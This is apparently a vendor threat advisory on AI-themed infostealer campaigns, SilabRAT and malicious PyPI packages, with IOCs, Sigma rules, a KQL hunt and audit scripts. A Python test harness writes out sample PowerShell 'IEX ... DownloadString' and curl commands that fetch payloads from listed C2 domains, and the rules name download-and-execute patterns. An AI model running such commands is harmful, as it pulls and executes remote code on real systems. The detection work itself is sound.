
Storm-3075 AI Hype & SilabRAT MaaS: Multi-Vector Infostealer Surge & PyPI Supply Chain Compromise

Security Arsenal Team
June 11, 2026

A sophisticated wave of financially motivated credential theft campaigns has been identified targeting sectors including Education, Finance, Technology, and Bioinformatics. The activity centers around the distribution of multiple infostealer families—Vidar, Lumma Stealer, SilabRAT, and RustyStealer—facilitated by diverse attack vectors.

The primary actor, Storm-3075, is exploiting the global AI hype by impersonating brands like ChatGPT and Copilot to deliver Vidar and Lumma via malvertising and SEO poisoning. Simultaneously, threat actor o1oo1 is actively marketing the advanced SilabRAT on the dark web, featuring HVNC and browser profile cloning. In a parallel supply chain attack, malicious Python packages (Mini Shai-Hulud, Miasma, Hades) are targeting developers via PyPI and npm. Furthermore, social media platforms (TikTok) are being abused to distribute Vidar through fake software tutorials, while the modular Needle C2 platform specifically targets cryptocurrency wallets.

The collective objective is the exfiltration of session cookies, cryptocurrency wallet keys, and system credentials to enable financial fraud and unauthorized access.

Threat Actor / Malware Profile

Storm-3075 & Vidar/Lumma Campaign

  • Distribution: Social engineering via fake AI branding (ChatGPT, DeepSeek), malvertising, and SEO-driven search result poisoning.
  • Payload Behavior: Vidar and Lumma Stealers focus on harvesting browser data, saved passwords, and cryptocurrency wallets. Hijack Loader is used as a shellcode loader to execute payloads.
  • C2 Communication: HTTP/HTTPS based C2 utilizing domain generation algorithms or hardcoded domains (e.g., brokeapt.com).
  • Persistence: Scheduled tasks or registry run keys established via the initial loader.

SilabRAT (Actor: o1oo1)

  • Distribution: Malware-as-a-Service (MaaS) sold for $5,000/month on dark web forums.
  • Payload Behavior: Advanced RAT featuring Hidden Virtual Network Computing (HVNC) for invisible remote control, browser profile cloning to bypass MFA, and session hijacking.
  • C2 Communication: Encrypted communication to bulletproof-hosted infrastructure (IP: 91.199.163.124).
  • Anti-Analysis: Uses AsmCrypt for obfuscation and may employ anti-debugging techniques common in MaaS offerings.

PyPI Supply Chain (Hades, Miasma, Mini Shai-Hulud)

  • Distribution: Typosquatting and malicious packages in PyPI/npm targeting bioinformatics and MCP developers.
  • Payload Behavior: Malicious .pth hooks and trojanized native .abi3.so extensions execute upon import. Used to establish persistence and download secondary payloads.
  • Persistence: Python startup scripts and compromised development environments.
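The `.pth` hook described above works because Python's `site.py` executes any `.pth` line that begins with `import ` (or `import<TAB>`) at every interpreter start-up. The following audit script is an added example, not code from the advisory or from the packages it describes; it lists every such executable line in the site-packages directories of the running interpreter, and the allow-list of benign hook files is an assumption to tune per environment.

```python
"""Audit .pth files for import-time code execution hooks.

Python's site.py executes any .pth line that starts with 'import ' (or
'import<TAB>') every time the interpreter starts, which is the persistence
mechanism the Miasma/Hades packages abuse. Added example, not code from the
advisory; the benign-file allow-list is an assumption to tune per environment.
"""
import site
from pathlib import Path

# Files shipped by common tooling that legitimately carry import hooks (assumption).
KNOWN_BENIGN_FILES = {"distutils-precedence.pth", "_virtualenv.pth"}


def scan_pth_file(pth_path: Path) -> list:
    """Return (line_no, text) for every line site.py would exec() in this file."""
    try:
        lines = pth_path.read_text(encoding="utf-8", errors="replace").splitlines()
    except OSError:
        return []
    # Same test site.addpackage() applies; other non-comment lines are only
    # appended to sys.path and are never executed.
    return [(no, raw.rstrip()) for no, raw in enumerate(lines, 1)
            if raw.startswith(("import ", "import\t"))]


def scan_pth_dir(directory) -> list:
    """Scan the .pth files directly inside one site-packages directory."""
    directory = Path(directory)
    if not directory.is_dir():
        return []
    findings = []
    for pth in sorted(directory.glob("*.pth")):
        for line_no, code in scan_pth_file(pth):
            findings.append({"file": str(pth), "line": line_no, "code": code,
                             "known_benign": pth.name in KNOWN_BENIGN_FILES})
    return findings


def scan_interpreter() -> list:
    """Scan every site-packages directory the running interpreter loads from."""
    dirs = list(site.getsitepackages()) + [site.getusersitepackages()]
    return [f for d in dict.fromkeys(dirs) for f in scan_pth_dir(d)]


if __name__ == "__main__":
    for f in scan_interpreter():
        tag = "known-benign" if f["known_benign"] else "REVIEW"
        print(f"[{tag}] {f['file']}:{f['line']}: {f['code']}")
```

Run it inside each developer virtual environment as well as the system interpreter, since every environment has its own site-packages directory.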

Needle / RustyStealer

  • Distribution: Crypto-focused campaigns targeting browser extensions and desktop wallet users.
  • Payload Behavior: Browser extension spoofing (MetaMask, Phantom) and desktop impersonation (Exodus, Ledger).
  • Objective: Direct theft of cryptocurrency keys through wallet-spoofing mechanisms.

IOC Analysis

The provided indicators include:

  • File Hashes (SHA1/SHA256): Specific signatures for the malware loaders (Hijack Loader, SilabRAT), payloads (Vidar, Lumma), and supply chain artifacts (Miasma, Hades). SOC teams should use EDR solutions to query these hashes across endpoints.
  • Domains: C2 domains (msget.run, d4ug.site, brokeapt.com) used for payload delivery and callback. These should be blocked at the perimeter and DNS level.
  • IPv4: 91.199.163.124 associated with SilabRAT C2 infrastructure.
  • Operationalization: Push domains to firewalls/proxies. Configure SIEM to alert on DNS requests to these domains. Use EDR to hunt for the specific file hashes.

Detection Engineering

```yaml
---
title: Potential Vidar Stealer Execution via PowerShell
description: Detects execution patterns associated with Vidar Stealer distribution via fake tutorials or AI bait, involving PowerShell downloading payloads from suspicious domains.
status: experimental
date: 2026/06/12
author: Security Arsenal
references:
  - https://www.infosecurity-magazine.com/news/fake-software-videos-tiktok-vidar/
tags:
  - attack.execution
  - attack.t1059.001
  - attack.command_and_control
  - attack.t1071.001
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - 'Invoke-WebRequest'
      - 'IEX'
      - 'DownloadString'
  selection_domain:
    CommandLine|contains:
      - 'msget.run'
      - 'd4ug.site'
      - 'brokeapt.com'
  condition: selection and selection_domain
falsepositives:
  - Legitimate software installation scripts
level: high
---
title: SilabRAT MaaS C2 Traffic
description: Detects network connections to known SilabRAT C2 infrastructure or patterns consistent with its HVNC tunneling.
status: experimental
date: 2026/06/12
author: Security Arsenal
references:
  - https://www.group-ib.com/blog/silabrat-hijackloader-trojan-malware/
tags:
  - attack.command_and_control
  - attack.t1071
logsource:
  category: network_connection
  product: windows
detection:
  selection_ip:
    # exact match: a substring match on an IP string can also hit unrelated addresses
    DestinationIp: '91.199.163.124'
  selection_port:
    DestinationPort: 443
  condition: selection_ip and selection_port
falsepositives:
  - Rare legitimate traffic to this IP
level: critical
---
title: Malicious PyPI Package Import (Miasma/Hades)
description: Detects execution of Python processes importing suspicious libraries associated with the Mini Shai-Hulud, Miasma, or Hades campaigns.
status: experimental
date: 2026/06/12
author: Security Arsenal
references:
  - https://socket.dev/blog/mini-shai-hulud-miasma-and-hades-worms-target-bioinformatics-and-mcp-developers-via-malicious
tags:
  - attack.initial_access
  - attack.t1195.001
  - attack.execution
logsource:
  category: process_creation
  product: windows
detection:
  selection_python:
    Image|endswith:
      - '\python.exe'
      - '\python3.exe'
  selection_cli:
    CommandLine|contains:
      - 'import miasma'
      - 'import hades'
      - 'import shai'
      - '.pth'
  condition: selection_python and selection_cli
falsepositives:
  - Legitimate development work (verify package names)
level: high
```
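Before deploying the first rule, it is worth confirming that its selections combine the way Sigma intends. The script below is an added example, not part of the advisory: a minimal evaluator for the constructs these rules use (the `|endswith` and `|contains` modifiers, AND across the fields of one selection, OR across list values, and the `selection and selection_domain` condition), run over constructed process-creation events rather than real telemetry.

```python
"""Exercise the 'Potential Vidar Stealer Execution via PowerShell' rule above against
constructed process_creation events. Added example, not from the advisory: a minimal
evaluator for the Sigma constructs these rules use (|endswith, |contains, AND across
fields, OR across list values, 'selection and selection_domain'), case-insensitive."""

VIDAR_PS_RULE = {
    "selection": {
        "Image|endswith": ["\\powershell.exe"],
        "CommandLine|contains": ["Invoke-WebRequest", "IEX", "DownloadString"],
    },
    "selection_domain": {"CommandLine|contains": ["msget.run", "d4ug.site", "brokeapt.com"]},
}

def field_matches(event: dict, spec: str, values: list) -> bool:
    """One 'Field|modifier' entry; any listed value may match (OR)."""
    field, _, modifier = spec.partition("|")
    actual = str(event.get(field, "")).lower()
    for value in (str(v).lower() for v in values):
        if modifier == "endswith" and actual.endswith(value):
            return True
        if modifier == "contains" and value in actual:
            return True
    return False

def selection_matches(event: dict, selection: dict) -> bool:
    """Every field entry inside one selection must match (AND)."""
    return all(field_matches(event, spec, vals) for spec, vals in selection.items())

def vidar_rule_fires(event: dict) -> bool:
    """condition: selection and selection_domain"""
    return all(selection_matches(event, VIDAR_PS_RULE[n]) for n in ("selection", "selection_domain"))

# Constructed sample events, not real telemetry. The third shows the rule's scope:
# the same domain fetched by a non-PowerShell process is left to the network hunt.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('https://msget.run/x')"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://updates.example.com/setup.ps1 -OutFile setup.ps1"},
    {"Image": r"C:\Windows\System32\curl.exe", "CommandLine": "curl.exe https://d4ug.site/p -o p.exe"},
]

def evaluate(events=SAMPLE_EVENTS) -> list:
    """Return one verdict per event, in input order."""
    return [vidar_rule_fires(e) for e in events]

if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, evaluate()):
        print("ALERT " if verdict else "clean ", event["CommandLine"][:60])
```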


```kql
// Hunt for Vidar/SilabRAT network IOCs and PowerShell download activity.
// Both sub-queries are bound with let and merged with union; order by time.
let Lookback = 7d;
let C2Domains = dynamic(['msget.run', 'd4ug.site', 'brokeapt.com', 'pan.rongtv.xyz', 'pan.ssffaa19.xyz']);
let NetworkHits = DeviceNetworkEvents
| where Timestamp > ago(Lookback)
// RemoteUrl may hold a full URL rather than a bare host, so use term matching, not equality
| where RemoteUrl has_any (C2Domains) or RemoteIP == '91.199.163.124'
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP
| extend HuntContext = 'Infostealer C2 or Payload Delivery';
let LoaderHits = DeviceProcessEvents
| where Timestamp > ago(Lookback)
| where ProcessCommandLine has_any ('Invoke-WebRequest', 'DownloadString', 'IEX')
    and ProcessCommandLine has_any ('msget.run', 'd4ug.site')
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, FolderPath
| extend HuntContext = 'Vidar Stealer PowerShell Loader';
union NetworkHits, LoaderHits
| order by Timestamp desc
```


```powershell
# IOC Hunt Script for Infostealer Campaigns
# Checks for specific file hashes and known malicious file paths

$TargetHashes = @(
    "4f5c5b3ef45cfff7721754487a86aeff9a2e6e32",
    "0a26238f6c516de5885457c93042531aa59bc206a9537cebf5267cedc6c68531",
    "25270cc429ada8028b5b33220ed412c47907ecceea7377d608fac5af01bed56a",
    "5455341ed1bbe75a664fca2dd0794c508e1874f75360253a7ff5bc119bc92d80",
    "56d722b0331bf0aaa86bb37483486c6dff6ad9427fc473ed7c3226c21a9bdd23",
    "3a6adbe0081b2488e0f137496e92591e0c29148154b2d99faadab9cc435b879b",
    "79f8da9f9fb4ac7c16d9c210f1f6ef418357a3e7bf602b1dd03a490596fa58c5",
    "fb56e66920c84ef9e51db0ea23144f5755daef97cbff8613b05ab56d0dc9d623",
    "fbce30a0c852972fdc24f1b6a7c270512a50ef1a7c6c88c88b92a2dcbdfdd023",
    "6506d31707a39949f89534bf9705bcf889f1ecae3dbc6f4ff88d67a8be3d01b2",
    "6d332f814f15f19758d65026bbfd0a8c49671b319ec77b8fa1b27fc48afff7d9",
    "0d681bd160db1b1df5db321a6d2dd9ae81b2609b"
)

$SuspiciousPaths = @(
    "$env:APPDATA\*",
    "$env:TEMP\*",
    "$env:USERPROFILE\Downloads\*"
)

Write-Host "[+] Starting Scan for Infostealer IOCs..."

foreach ($Path in $SuspiciousPaths) {
    if (Test-Path $Path) {
        Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {
            $File = $_
            # Get-FileHash takes a single -Algorithm value, so hash each file once per
            # algorithm; the IOC list mixes SHA1 and SHA256 values.
            foreach ($Algorithm in @('SHA1', 'SHA256')) {
                $Hash = Get-FileHash -LiteralPath $File.FullName -Algorithm $Algorithm -ErrorAction SilentlyContinue
                # -contains compares case-insensitively, so the uppercase output of
                # Get-FileHash still matches the lowercase IOC strings above.
                if ($Hash -and ($TargetHashes -contains $Hash.Hash)) {
                    Write-Host "[!] MALICIOUS FILE FOUND: $($Hash.Path) | $($Algorithm): $($Hash.Hash)"
                }
            }
        }
    }
}

# Check for DNS cache entries related to C2 domains
$Domains = @("msget.run", "d4ug.site", "brokeapt.com", "pan.rongtv.xyz")
$DnsCache = Get-DnsClientCache -ErrorAction SilentlyContinue

foreach ($Domain in $Domains) {
    # Match on both the queried name (Entry) and the record name (Name)
    $Hits = $DnsCache | Where-Object { $_.Entry -like "*$Domain*" -or $_.Name -like "*$Domain*" }
    if ($Hits) {
        Write-Host "[!] SUSPICIOUS DNS ENTRY FOUND: $Domain"
    }
}

Write-Host "[+] Scan Complete."
```


# Response Priorities

*   **Immediate:**
    *   Block all identified domains (`msget.run`, `d4ug.site`, `brokeapt.com`, `pan.rongtv.xyz`) and IP address (`91.199.163.124`) on firewalls and proxies.
    *   Scan endpoints for the provided SHA1/SHA256 hashes.
    *   Identify and quarantine systems exhibiting PowerShell web-request behavior to the listed domains.

*   **24 Hours:**
    *   Conduct credential resets for users on devices flagged with IOC matches.
    *   Review browser extension logs for unauthorized installations related to crypto wallets (MetaMask, Phantom, Trust Wallet) indicative of "Needle" activity.
    *   Audit Python/PyPI package usage in developer environments for the malicious packages listed.

*   **1 Week:**
    *   Implement application controls to restrict unsigned PowerShell scripts and binary execution from user directories.
    *   Enforce strict allow-listing for PyPI/npm repositories and developers.
    *   Provide security awareness training focused on AI-themed social engineering and software cracks distributed via social media.
